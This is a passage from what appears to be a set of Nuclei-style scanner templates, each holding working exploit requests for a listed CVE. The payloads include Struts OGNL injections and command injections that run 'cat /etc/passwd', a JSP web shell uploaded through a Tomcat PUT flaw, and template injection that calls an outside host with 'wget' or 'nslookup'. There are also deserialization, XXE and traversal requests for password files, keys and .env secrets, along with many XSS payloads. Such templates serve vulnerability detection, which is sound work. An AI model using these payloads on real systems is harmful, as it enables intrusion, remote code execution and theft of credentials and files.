name=\"id\"\n\n%{\n(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\n}\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\u2014\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-40856","info":{"name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /about/../tree?action=get HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"TYPE\"","\"ITEMS\"","\"COUNT\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25099","info":{"name":"WordPress GiveWP <2.17.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=give_checkout_login&form_id=xxxxxx\"><script>alert(document.domain)</script>\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"give_user_login\")"],"condition":"and"}]}]},{"id":"CVE-2021-26702","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40323","info":{"name":"Cobbler <3.3.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>find_profile</methodName>\n  <params>\n    <param>\n      <value>\n        <struct>\n          <member>\n            <name>name</name>\n            <value>\n              <string>*</string>\n            </value>\n          </member>\n        </struct>\n      </value>\n    </param>\n  </params>\n</methodCall>\n","POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>generate_script</methodName>\n  <params>\n    <param>\n      <value>\n        <string>{{profile}}</string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string></string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string>/etc/passwd</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/xml"]},{"type":"regex","regex":["root:.*:0","bin:.*:1","nobody:.*:99"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"profile","group":1,"regex":["<value><string>(.*?)</string></value>"],"internal":true}]}]},{"id":"CVE-2021-35265","info":{"name":"MaxSite CMS > V106 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E","{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>"]},{"type":"word","part":"body","words":["mso-comments-rss\">RSS</a>","MaxSite CMS","feed\"><span>RSS</span>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32819","info":{"name":"Nodejs Squirrelly - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-27330","info":{"name":"Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/calendar/calendar_form.php/\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>TriConsole.com - PHP Calendar Date Picker</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44529","info":{"name":"Ivanti EPM Cloud Services Appliance Code Injection","severity":"critical"},"requests":[{"raw":["GET /client/index.php HTTP/1.1\nHost: {{Hostname}}\nCookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo()","Cloud Services Appliance"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29622","info":{"name":"Prometheus  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/new/newhttp://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-24746","info":{"name":"WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts","{{BaseURL}}/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["?a\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"slug","group":1,"regex":["\"slug\":\"([_a-z-A-Z0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-27519","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["highlightSearchTerms(\"x\" onmouseover=alert(1) x=\"\");"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9822","info":{"name":"DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /__ HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nCookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key=\"name1: key1\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type=\"xsd:string\">C:\\Windows\\win.ini</anyType></MethodParameters><ObjectInstance xsi:type=\"FileSystemUtils\"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]","for 16-bit app support"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2017-10974","info":{"name":"Yaws 1.91 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C../ssl/yaws-key.pem"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), \"<html\")"]},{"type":"word","words":["BEGIN RSA PRIVATE KEY"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18024","info":{"name":"AvantFAX 3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=admin&_submit_check=1&jlbqg<script>alert(\"{{randstr}}\")</script>b7g0x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(\"{{randstr}}\")</script>","AvantFAX"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14849","info":{"name":"Node.js <8.6.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../a/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9833","info":{"name":"BOA Web Server 0.94.14 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14535","info":{"name":"Trixbox - 2.8.0.4 OS Command Injection","severity":"high"},"requests":[{"raw":["GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\nConnection: close\nCache-Control: max-age=0\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11629","info":{"name":"FineCMS <=5.0.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>p\u4e0d\u5b58\u5728"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7925","info":{"name":"Dahua Security - Configuration File Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/passwd"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body), \"ugm\")","contains(to_lower(body), \"id:name:passwd\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["1:(.*:.*):1:CtrPanel"]}]}]},{"id":"CVE-2017-12629","info":{"name":"Apache Solr <= 7.1 - XML Entity Injection","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2017-7921","info":{"name":"Hikvision - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<firmwareVersion>"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2017-3506","info":{"name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\nContent-Type: text/xml;charset=UTF-8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header>\n    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n      <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n        <void id=\"url\" class=\"java.net.URL\">\n          <string>http://{{interactsh-url}}</string>\n        </void>\n        <void idref=\"url\">\n          <void id=\"stream\" method =\"openStream\"/>\n        </void>\n      </java>\n    </work:WorkContext>\n    </soapenv:Header>\n  <soapenv:Body/>\n</soapenv:Envelope>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-7391","info":{"name":"Magmi 0.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14622","info":{"name":"WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 500","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"2kb-amazon-affiliates-store\")"],"condition":"and"}]}]},{"id":"CVE-2017-12611","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15287","info":{"name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"word","words":["Unknown command: <script>alert(document.cookie)</script>"]}]}]},{"id":"CVE-2017-12794","info":{"name":"Django Debug Page - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000163","info":{"name":"Phoenix Framework - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?redirect=/\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2017-12617","info":{"name":"Apache Tomcat - Remote Code Execution","severity":"high"},"requests":[{"raw":["PUT /{{randstr}}.jsp/ HTTP/1.1\nHost: {{Hostname}}\n\n<% out.println(\"CVE-2017-12617\");%>\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2017-12617"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12542","info":{"name":"HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/v1/AccountService/Accounts"],"headers":{"Connection":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["iLO User"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9140","info":{"name":"Reflected XSS - Telerik Reporting Module","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)"],"matchers-condition":"and","matchers":[{"type":"word","words":["#000000\"onload=\"prompt(1)","Telerik.ReportViewer.axd?name=Resources"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14186","info":{"name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15647","info":{"name":"FiberHome Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17059","info":{"name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"],"body":"amty_hidden=1","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12635","info":{"name":"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation","severity":"critical"},"requests":[{"raw":["PUT /_users/org.couchdb.user:poc HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\n\n{\n  \"type\": \"user\",\n  \"name\": \"poc\",\n  \"roles\": [\"_admin\"],\n  \"roles\": [],\n  \"password\": \"123456\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","Location:"]},{"type":"word","part":"body","words":["org.couchdb.user:poc","conflict","Document update conflict"]},{"type":"status","status":[201,409]}]}]},{"id":"CVE-2017-12138","info":{"name":"XOOPS Core 2.5.8 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /user.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login\n","GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2017-1000028","info":{"name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd","{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-15363","info":{"name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<?php","'host'","'database'","'extConf'","'debug'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11512","info":{"name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini","{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2017-1000029","info":{"name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/file%3a///etc/passwd/"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16894","info":{"name":"Laravel <5.5.21 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.env"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["APP_NAME=","APP_DEBUG=","DB_PASSWORD="],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12615","info":{"name":"Apache Tomcat Servers - Remote Code Execution","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/poc.jsp/"],"body":"<%@ page import=\"java.util.*,java.io.*\"%>\n<%\nif (request.getParameter(\"cmd\") != null) {\n        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n        OutputStream os = p.getOutputStream();\n        InputStream in = p.getInputStream();\n        DataInputStream dis = new DataInputStream(in);\n        String disr = dis.readLine();\n        while ( disr != null ) {\n                out.println(disr);\n                disr = dis.readLine();\n                }\n        }\n%>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9288","info":{"name":"WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000170","info":{"name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"],"body":"dir=%2Fetc%2F&onlyFiles=true","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<li class='file ext_passwd'>","<a rel='/passwd'>passwd</a></li>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5638","info":{"name":"Apache Struts 2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14135","info":{"name":"OpenDreambox 2.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/bin/sh","/usr/script"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15944","info":{"name":"Palo Alto Network PAN-OS - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID={{randstr}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@start@Success@end@"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10075","info":{"name":"Oracle Content Server - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO","{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","ORACLE_QUERY"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9506","info":{"name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} 